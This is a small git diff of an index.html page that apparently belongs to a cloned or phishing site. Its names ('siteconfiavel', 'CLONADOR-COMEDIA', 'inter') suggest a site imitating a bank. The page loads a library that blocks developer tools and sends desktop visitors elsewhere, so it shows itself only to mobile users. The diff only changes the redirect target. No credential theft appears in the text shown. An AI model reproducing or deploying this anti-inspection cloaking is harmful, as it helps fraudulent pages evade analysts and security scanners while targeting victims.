--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
  <script disable-devtool-auto="" src="https://cdn.jsdelivr.net/npm/disable-devtool" url="https://siteconfiavel.github.io/CLONADOR-COMEDIA/"></script>
 <script type="text/javascript">
   if (!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|IEMobile)/) && window.innerWidth > 768) {
-    window.location.href = 'https://comeceagoraa.github.io/inter/inter/';
+    window.location.href = 'https://comeceagoraa.github.io/inter/';
   }
 </script>
 
